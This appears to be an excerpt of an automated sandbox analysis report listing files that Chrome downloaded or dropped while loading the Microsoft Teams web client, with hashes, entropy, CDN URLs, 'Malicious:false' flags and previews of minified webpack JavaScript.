                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[336776],{911717:(e,t,n)=>{"use strict";n.d(t,{w:()=>r});var a=n(783148);class r{constructor(e,t){this.value=e,this.piiKind=t}static isPIIValue(e){return!!e&&"string"!=typeof e&&void 0!==e.scrub}scrub(){return(0,a.sha256)(JSON.stringify(this.value))}}},276201:(e,t,n)=>{"use strict";n.d(t,{$:()=>r});var a=n(34655);function r(e){if(!e||"object"!=typeof e)return!1;if("RegionGtmNotFoundInRespone"===e.errorCode)return!0;const t=e;return t.code===a.O4.InvalidResponse&&"Discover"===t.context&&"regionGtm"===t.subContext}},396949:(e,t,n)=>{"use strict";var a,r;n.d(t,{I:()=>a}),function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (45301)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):45412
                                                                                                                                                                                                                                                                            Entropy (8bit):5.252708559945616
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:elgFPa3AeVG1zmfM4ptko1dXkSo9NoVhmPuAABrglrPnGdnYMNOnSWH//LcdMvUi:s3XocRJd3nYMNOpLcCUMF/8ducIONOZv
                                                                                                                                                                                                                                                                            MD5:8E378799CC94AF45251563E58CDAFB42
                                                                                                                                                                                                                                                                            SHA1:5310A1B163FD4AC8ADE13A6030F1A67B5EB7478A
                                                                                                                                                                                                                                                                            SHA-256:AA33FB2D4DC806528EC08D63514A15E47FF6B5202B3C8F4B68DB4DB104EC3BEC
                                                                                                                                                                                                                                                                            SHA-512:346260C5887686FA179CE66D656AD6C0FEC7E02EEC0D4D725ACB8B2DDFE10C0AF409D466063CE4A7F121495D5737329A7F3DC0E6E0AA1DFB198D5669392C1989
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[606492],{621420:(e,t,s)=>{var i,n;s.d(t,{B:()=>i}),function(e){e.EditorCiq="EditorCiq"}(i||(i={})),function(e){e.light="light",e.dark="dark",e.highContrast="highContrast",e.custom="custom"}(n||(n={}))},911408:(e,t,s)=>{s.d(t,{Gf:()=>i,h7:()=>n,$Z:()=>o});const i="autocomplete-picker-list",n=e=>`autocomplete-picker-item${e}`,o="status-note-compose"},424443:(e,t,s)=>{s.d(t,{dn:()=>o,D0:()=>a,iR:()=>r,kx:()=>h});var i=s(364819),n=s(462034);const o=(e,t)=>s=>(c(e,s),t&&t(s),t=>(Reflect.set(t,Symbol.for("ComposeFramework"),{config:s,type:e}),Object.defineProperty(t,"name",{value:s.name}),t)),a=(e,t={},s)=>{if(!e)return;const[o,a]=r(e);if(!o)return;const c=Reflect.get(o,Symbol.for("ComposeFramework"));if(!c)throw new Error(`Extension not found - ${o.name}`);let h,d={};if(s){const e=new Set(c.config.hooks||[]);if(!(0,i.isEmpty)(e)){const t=new n.U(c.config.name,s);h=t,e.forEach((e=>
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):378372
                                                                                                                                                                                                                                                                            Entropy (8bit):5.447221326420668
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:tTPlsDwo0lV1LzACWOitEB3it4t4A8T+X6cQaFZRCXv+CDHaTDJu+qADyY1YSaBV:xPiDwGOitEB3it4t4A8T9gCLQGHSgV
                                                                                                                                                                                                                                                                            MD5:2BB75370039C53C5D0DF8F9F00CA25CB
                                                                                                                                                                                                                                                                            SHA1:9558BF060145E9803F32C76BB214DAA46EEF1484
                                                                                                                                                                                                                                                                            SHA-256:209F14BAE778016020A13C88E861A2565D98E41B2ACCF7ED16E5134B8D982717
                                                                                                                                                                                                                                                                            SHA-512:25BF87B4B37CB58180B60EB1A5A753737242AA73311F2608663BE4B162385AA521CB2869470A39B240E4856C87BD55C9DEA02D491D5505414F0CD845E0E445FE
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/services-calling-service-adapters-4d17f1e0cf67cc86.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[889503,583674,361293],{583674:(e,t)=>{function i(e){return null!=e&&"function"==typeof e.then}function r(e){return null!=e&&"function"==typeof e.cancel}function n(e,i){if(!t.config.catchExceptions)return e();try{return e()}catch(e){return i(e)}}Object.defineProperty(t,"__esModule",{value:!0}),t.config={exceptionsToConsole:!0,catchExceptions:!0,traceEnabled:!1,exceptionHandler:void 0,unhandledErrorHandler:function(e){throw e}},t.fromThenable=function(e){var t=g();return e.then((function(e){t.resolve(e)}),(function(e){t.reject(e)})),t.promise().thenAsync((function(e){return e}))};var s,o=[],a="undefined"!=typeof setImmediate;function l(e){o.push(e),1===o.length&&(a?setImmediate(c):setTimeout(c,0))}function c(){var e=o;o=[];for(var t=0;t<e.length;t++)e[t]()}function g(){return new s.SyncTask}function d(e){return(new s.SyncTask).resolve(e).promise()}function u(e){var t=g(),n=!1;r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14104)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):14212
                                                                                                                                                                                                                                                                            Entropy (8bit):4.793888724643343
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:jjqz7w2M3hbxUTViE/G5qVQY61phMH3LDZiGhRpldoWOhq0QEQSTf9+P:j2AXhVUTViE/G5qVQYkpaBT/on8bSL9g
                                                                                                                                                                                                                                                                            MD5:C779A3CD7F261EFEA6776C15C84F5548
                                                                                                                                                                                                                                                                            SHA1:C330D22070332B3DAB44F90167FA26F32D5F56CF
                                                                                                                                                                                                                                                                            SHA-256:39B145AA7B80DB2B82502A5237A71CE7AD23F6A24F316819765CF6CAE41C4F97
                                                                                                                                                                                                                                                                            SHA-512:F9D89DBFBB56766357ED4374490AD7901022E54B9444376C492B38CA288824A5DD2273D38B01F12C7C8809E1C1F02E7F671888A674F761FF0668FFDEE038DC53
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/725591-f9265ef9f2d4e54e.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725591],{852774:(a,e,l)=>{l.d(e,{MHj:()=>c,nDI:()=>M,Vjr:()=>r,Fm4:()=>n,S61:()=>A,SH1:()=>s,W5L:()=>u,jz7:()=>t,lwq:()=>U,V$h:()=>i,qvE:()=>P,qXC:()=>L,_E3:()=>h,uO1:()=>v,yQ7:()=>m,gNt:()=>d,Vo$:()=>g,HkI:()=>R,jcT:()=>o,TTi:()=>f,NUA:()=>V,fGI:()=>H,B2S:()=>F,Ndk:()=>y,grK:()=>w,qSk:()=>b,DWd:()=>k,Z4e:()=>O,TNE:()=>C,mx_:()=>D,U$D:()=>S,gC_:()=>_,ORW:()=>B,vsS:()=>$,F$H:()=>p,xmy:()=>q,hmO:()=>x,X8c:()=>E,fPq:()=>I,dR_:()=>j,MxQ:()=>N,KCz:()=>Q,y3Y:()=>T,gNc:()=>z,uOK:()=>G,X0b:()=>K,PM$:()=>W,nPn:()=>X,lYg:()=>Y,omG:()=>J,xo$:()=>aa,$Oq:()=>ea,b8q:()=>la,ADj:()=>Za,tOz:()=>ca,Vvl:()=>Ma,w8$:()=>ra,$xG:()=>na,Uhh:()=>Aa,It2:()=>sa});var Z=l(693935);const c=(0,Z.U)("PersonVoice20Regular","20",["M17.13 1.06a.5.5 0 0 1 .68.2 9.96 9.96 0 0 1 0 9.48.5.5 0 1 1-.88-.48 8.96 8.96 0 0 0 0-8.52.5.5 0 0 1 .2-.68Zm-2.32 1.97a.5.5 0 0 1 .65.27 6.98 6.98 0 0 1 0 5.4.5.5 0 1 1-.92-.39 5
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):66345
                                                                                                                                                                                                                                                                            Entropy (8bit):5.485619117096751
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:vFrS8I/4l8zDs+bRpsN4MMWBGChqpH5ribuOmTQGixspnaolYREREMXEEpkOwP:9rS8uvDs+JCBGChb4Bvkd
                                                                                                                                                                                                                                                                            MD5:0627FA9B97C09D193BA9F177A9C1CACE
                                                                                                                                                                                                                                                                            SHA1:4BDEB937AB94D1928AB6E8E76FC57356F6D8DB87
                                                                                                                                                                                                                                                                            SHA-256:282893A0578FE44FB847158542789239861E2FD8AEE6661CFB4A5F85EF070136
                                                                                                                                                                                                                                                                            SHA-512:FA8708EB4A0304E34F61919902EE48A6682B5B00B4213920E4960EEB40ECF6818A17CE64AA74A978380E55F7E46D7BDA7D4FACDE9FC22454573AE62E4501304C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[9124,885903],{912278:(e,t,o)=>{o.d(t,{x:()=>r});var n=o(562341),r=function(e){return{attributes:{root:{role:"radio","aria-checked":e.active,disabled:e.disabled,"aria-disabled":e.disabledFocusable}},keyActions:(0,n.V)(e).keyActions}}},639034:(e,t,o)=>{o.d(t,{n:()=>g});var n=o(513432),r=o(644525),a=o(854130),s=o(2187);var i=o(589256),l=o(602835),c=o(164093),u=o(250452),d=o(796831);const f=(e,t)=>{const{openItems:o,defaultOpenItems:r,multiple:a=!1,collapsible:s=!1,onToggle:f,navigation:m}=e,[p,v]=(0,i.i)({state:n.useMemo((()=>function(e){if(void 0===e)return;return Array.isArray(e)?e:[e]}(o)),[o]),defaultState:r&&(()=>function({defaultOpenItems:e,multiple:t}){if(void 0!==e)return Array.isArray(e)?t?e:[e[0]]:[e];return[]}({defaultOpenItems:r,multiple:a})),initialState:[]}),g=(0,d.i)({circular:"circular"===m,tabbable:!0}),b=(0,l.D)((e=>{const t=function(e,t,o,n){if(!o)return t[0]=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (31968)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):32342
                                                                                                                                                                                                                                                                            Entropy (8bit):5.796856592737622
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:qpWdBatM8ER62MFuDcdjxE91u85mbNScpv44rmjLoMCCfRz/6TBOgRZJCFE/b7NU:qcAxEIbMcpv44rK8MCCJz/6TBOgRZxU
                                                                                                                                                                                                                                                                            MD5:B863062969C157364657EF0513AD73DA
                                                                                                                                                                                                                                                                            SHA1:4A1D67AD41C1781C3816D242C0EE5EE0FE08CE18
                                                                                                                                                                                                                                                                            SHA-256:F246F2430B8EBE98376921AC4EECBF3389DC2664EA3F7C43185E604BC63875A4
                                                                                                                                                                                                                                                                            SHA-512:1A5D2693DADD3D04884BAC09948D97B327087BB12F8C6785EE9AC29E2C8D31C5B01FCF0FD50FB7F891343D92A2DF0ADCBE451ED7A723B39E3C5A52B13A93F78E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/79645-cfc686ee6202a315.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[79645],{461190:(e,t,s)=>{var n,i,o;s.d(t,{pG:()=>n,Ly:()=>i,Mv:()=>o}),function(e){e.ComposeMessage="composeMessage",e.PostCompose="postCompose",e.MessageList="messageList",e.Powerbar="powerbar",e.VirtualTreeList="virtualTreeList",e.FeedsFilter="feedsFilter",e.PeoplePicker="peoplePicker",e.SearchBox="searchBox",e.Floodgate="floodgate",e.ChatListSearchFilter="chatListSearchFilter",e.ChannelListSearchFilter="channelListSearchFilter",e.CallingPerf="callingPerf",e.TeamsAndChannelsTable="teamsAndChannelsTable",e.DiscoverSurfaceFeedList="discoverSurfaceFeedList",e.AllChannelSystemMessages="channelInfoPaneAllSystemMessages",e.AllPinnedPosts="channelInfoPaneAllPinnedPosts",e.UnifiedFunPicker="unifiedFunPicker",e.CreateTeamGallery="createTeamGallery",e.AddMember="addMember",e.MeetForWorkList="meetForWorkList",e.MeetForWorkSearchFilter="meetForWorkSearchFilter",e.PeopleAppContactList="
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):35168
                                                                                                                                                                                                                                                                            Entropy (8bit):7.99275807202193
                                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                                            SSDEEP:768:FlTfWbX2KT+Hid0L7lumndasuVyeLtCR4sqvrdYnN6UcepZtf/r6:LgbT+Hid0TFbeLtUGvrdCNqepbHr6
                                                                                                                                                                                                                                                                            MD5:D3B6AE9986DF244AB03412CC700335D0
                                                                                                                                                                                                                                                                            SHA1:BAAA1F9899178938F3881F09B18265E47DA806E3
                                                                                                                                                                                                                                                                            SHA-256:CA50059111D30C2E212C90805792EB543548AEF0D4941E886A778E3DCE0B9066
                                                                                                                                                                                                                                                                            SHA-512:755C57FBC9BECE435A477F76C5E8198CA8942C23BE667ACAB83A00E5CD4F54075B10AA07C7FDC10C38FC3D5C0C406C9132FEB5B67BA5BCCC57EF796054A84E7C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........:..z.>.y..u.....N...^..S.......z~@..;...n...K........x..A]....F.8X&Em..P.s.....a.g.|.d......._..C`.xQ...\..'...QP....?.R.{?....|.>........E4.GRz...z.k.z.}....h..>.{[E.:.....Pu. ..e6_.o.p*.w...>...:...o.k~...~..&E._..}}.}%[. ..#......z.5M.b.....z..k.H.4...l..D.o...z..M.+../..`....?y.J4.=....u.....Z.....E.d.....{0H^...8.....9..h......d..6j......../..z..V<.`.F.xm.y..yt.J....
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5570)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):5678
                                                                                                                                                                                                                                                                            Entropy (8bit):5.412429152356154
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:N2y+zXTgXS4IvFM3pwRY4XCcO+Luj20gwceo1zf/ArJPawBXj/kb+DE:NgEi4ItM3pmEcOQuzx4f/AVXYKDE
                                                                                                                                                                                                                                                                            MD5:29ACBE811F209B39A435C7D0FF3CC186
                                                                                                                                                                                                                                                                            SHA1:541A19A018AA0D425A4958054BD5EC6B66749E60
                                                                                                                                                                                                                                                                            SHA-256:BB44554D718C31BA72F43929903CE73E8093406C59658C00EFE2F80F70D498E0
                                                                                                                                                                                                                                                                            SHA-512:E13F6E954CF561E68E4F3D89D1AD662CBD1D406AFA4D216A118109FD5403BB98D1C7D712E10FD8D366A122719F62F7DDCA722C71120EB3A1018C60F87713CFAC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/816373-105b523bdd46a179.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816373],{752705:function(t,n,e){!function(r,i){{const r=(o=o||function(t,n){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==e.g&&e.g.crypto&&(r=e.g.crypto),!r)try{r=e(475443)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(n){var e;return t.prototype=n,e=new t,t.prototype=null,e}}(),s={},a=s.lib={},c=a.Base={extend:function(t){var n=o(this);retu
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):89359
                                                                                                                                                                                                                                                                            Entropy (8bit):5.0428571426668665
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:4oHHHkXstnefJ5HfQ2vHpY5CFh3NDlQ+h4D5CwaWIWmXuIYGtP+ztrVS2yjhAABJ:FnXHEkLpZlc
                                                                                                                                                                                                                                                                            MD5:DCED61FA868D7864FE3ABFA48ED29F7F
                                                                                                                                                                                                                                                                            SHA1:230831790AEFA04B3CA2D3D1CCC81A25B58F0AAE
                                                                                                                                                                                                                                                                            SHA-256:0D6CD5309375084F03E2203EB81DC1CFE75C2CF48095AB04936E2A44AC3ACB0B
                                                                                                                                                                                                                                                                            SHA-512:DC008E687190D8A01A96079759D991B1549342221EF52B1C4FD4B3290D6F43A2DF7AC1D410FE4FD19E719D9CA7A990928A279703892FE3E6783BE029AEF30FA5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/r_data-resolvers-browser-1gql-view-data-5528bf7cdd434372.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[931740],{169471:e=>{e.exports=[{types:{OneGQL_ChannelCardContentViewData:[2,{aboutLabel:6,sensitivityLabel:6,inThisChannelLabel:6,seeChannelLabel:6,getLinkToChannelLabel:6,getEmailAddressLabel:6,leaveChannelLabel:6}],OneGQL_ChannelCardHeaderViewData:[2,{standardLabel:6,privateLabel:6,sharedLabel:6,externalLabel:6,addMembersLabel:6,shareChannelWithPersonLabel:6,shareChannelWithTeamLabel:6,manageChannelLabel:6,channelNotificationsLabel:6,teamAvatarLabel:6}],OneGQL_ChannelCardViewData:[2,{channelCardHeaderModel:"OneGQL_ChannelCardHeaderViewData!",channelCardContentModel:"OneGQL_ChannelCardContentViewData!"}],OneGQL_LeftRailFilterInput:[6,{pills:"[OneGQL_SimpleCollabFilterTag]",text:1}],OneGQL_SimpleCollabFilterTag:[5,["CHATS","TEAMS_AND_CHANNELS","MENTIONS","MEETINGS","MUTED","UNREAD","NON_MEETING_CHATS","UNMUTED"]],OneGQL_SimpleCollabLeftRailViewData:[2,{simpleCollabHeaderLabel:6,simpleColl
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):165373
                                                                                                                                                                                                                                                                            Entropy (8bit):4.8580714257855115
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:q6ob04mdMh5vy5Rd5/xxLh0FRhsB7451gB:L4jh5vy5Rd5Z0FRhS743q
                                                                                                                                                                                                                                                                            MD5:2DF7253CB0863CDD3851A62CEC73F84F
                                                                                                                                                                                                                                                                            SHA1:A3FCB7852D064E750EEDE8320900FFF5107B8DA6
                                                                                                                                                                                                                                                                            SHA-256:0D7A2616CADCCE9F872C258983E4B9DBB513A133298D11A578F18AE3CFDF0A79
                                                                                                                                                                                                                                                                            SHA-512:BFD4E5E57450C849C9429B21B19BBC1B03F0545DE454FEC84F0E55E787250205929C8E5B74E5BBA616072EF68C4AF135E2E23846BD102EAA4B195C6D72145C9E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/802756-1461cbc85977eebf.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[802756],{802756:(e,t,a)=>{var o;function _(e={},t){return new Proxy(e,{get:(e,a)=>t?a in e?e[a]:t(String(a)):String(a)})}a.d(t,{SQ:()=>o,Cu:()=>n,BQ:()=>r}),function(e){e[e.Expanded=1]="Expanded",e[e.ExpandedAndPacked=2]="ExpandedAndPacked",e[e.Packed=3]="Packed"}(o||(o={}));const i=e=>e.replace(/[A-Z]/g,((e,t)=>0===t?e.toLowerCase():`_${e.toLowerCase()}`)),n=_({SliceSwitch:"activity_slice_switch",FeedListRendered:"feeds_focused_load",FeedListLoadNext:"feeds_focused_load_more",SlicesFeedListRendered:"slices_feeds_focused_load",SlicesFeedListLoadNext:"slices_feeds_focused_load_more",ActivityNameSpaceLoadScenario:"feeds_store_feed_item_namespace_load",AMSMemoryCachePrune:"ams_memory_cache_prune",GetAppPreviewResult:"ext_get_app_preview_result_appbasedlink",AppBasedLink:"ext_app_based_link",AppBasedLinkFetchAppDetails:"ext_app_based_link_fetch_app_details",AppBasedLinkChangedToo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (20845)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):20952
                                                                                                                                                                                                                                                                            Entropy (8bit):5.312655616899363
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:Xvr3TLvGAkYt54AlLR3Rr6yRZvS1RdWspv8CHSIJ+t4l1:XvPrRT+z
                                                                                                                                                                                                                                                                            MD5:0DA43D7DD5D49C8E50684556326AEEA6
                                                                                                                                                                                                                                                                            SHA1:8308F2C481046EE86F6FA114948131B82E841F98
                                                                                                                                                                                                                                                                            SHA-256:BF86140F152FCCF6763F7B46B18E7F78D2FDFD6B18FD6684E741E0104C415F61
                                                                                                                                                                                                                                                                            SHA-512:B8EA54E4C46839E8AB211D4562296C06F7540AE463C33A2F510F6851DED718553F4EF4C2733E2D6572943828439B7AF3EF4A7705D67C071DB1EC2AE60DC477D1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/94139-a0e97f9184666b52.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[94139],{214238:(t,e,r)=>{function n(t,e){if(null==t)throw new TypeError("assign requires that input parameter not be null or undefined");for(var r in e=e||{})Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r]);return t}r.d(e,{A:()=>n})},94139:(t,e,r)=>{r.d(e,{A:()=>ot});var n=r(864627),a=r(798202),i=r(805247),o=r(214238),u=r(489176),s=r(997464),c=r(896825),d=r(650616),l=r(336116),f=r(425179);function w(t,e,r){(0,f.A)(2,arguments);var n=r||{},a=n.locale,o=a&&a.options&&a.options.weekStartsOn,u=null==o?0:(0,d.A)(o),s=null==n.weekStartsOn?u:(0,d.A)(n.weekStartsOn);if(!(s>=0&&s<=6))throw new RangeError("weekStartsOn must be between 0 and 6 inclusively");var c=(0,i.A)(t),l=(0,d.A)(e),w=((l%7+7)%7<s?7:0)+l-c.getUTCDay();return c.setUTCDate(c.getUTCDate()+w),c}var h=r(315391);var m=r(534711);var b=r(510327),T=r(715394),p=/^(1[0-2]|0?\d)/,y=/^(3[0-1]|[0-2]?\d)/,g=/^(36[0-6]|3[0-5]
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47016)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):47124
                                                                                                                                                                                                                                                                            Entropy (8bit):5.288745142117651
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:kCVHH8encpTYeGq1q0V0UDA8MnSj5udSTYSzPz2:bH8enclYpmJV5DA8MnSj5udgYYa
                                                                                                                                                                                                                                                                            MD5:F6D80FCD9D1F9EAFB54E2B26C2A1BE5A
                                                                                                                                                                                                                                                                            SHA1:ACF87FC3F2AF50DDCF4FCABB5BCDC8DAE6E878D3
                                                                                                                                                                                                                                                                            SHA-256:511C92C1498EE0E4576F214C41C7499DD9B8A2CB94DF79934A48F0707B3B1AED
                                                                                                                                                                                                                                                                            SHA-512:A1BBF2851B958F5F398EBBEB2629607E63DA99A7849628657CC70F9855827A56E53E98C55AF6F041AE3B0E71DB6ABA6E4066712B5D93DDD903F5CC6275AA425A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/985157-23a375d8f9446453.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[985157],{943015:(e,t,r)=>{"use strict";function n(e,t){var r="undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(r)return(r=r.call(e)).next.bind(r);if(Array.isArray(e)||(r=function(e,t){if(!e)return;if("string"==typeof e)return i(e,t);var r=Object.prototype.toString.call(e).slice(8,-1);"Object"===r&&e.constructor&&(r=e.constructor.name);if("Map"===r||"Set"===r)return Array.from(e);if("Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r))return i(e,t)}(e))||t&&e&&"number"==typeof e.length){r&&(e=r);var n=0;return function(){return n>=e.length?{done:!0}:{done:!1,value:e[n++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function i(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}function o(e,t){for(var r=0
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31315)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):31421
                                                                                                                                                                                                                                                                            Entropy (8bit):5.398625723740512
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:tdO5w+pZxoNvL7h75ihyMxceZAYZeYSZeQGoIzNm2MzebMYz8zpEzsJi:k8/e4fKRm2Ii
                                                                                                                                                                                                                                                                            MD5:683B05084B31459B6D8B328BDA6E4A26
                                                                                                                                                                                                                                                                            SHA1:7F73878DCBBAF3542EB5A2F8D9823358E1836AD1
                                                                                                                                                                                                                                                                            SHA-256:231472340E56061F645399B50A5034C1AD6CE3C76B40B339DF2F93D342499993
                                                                                                                                                                                                                                                                            SHA-512:5FED6304AF14EA7D4B27A7B6BF0DCF07C9B15084EAADE90B469249F411C9EE7C5F4C598923F14DB70E7A0E70D62C12B0075F644299C13D94CF8A94C87F5AF6B1
                                                                                                                                                                                                                                                                            Malicious:false
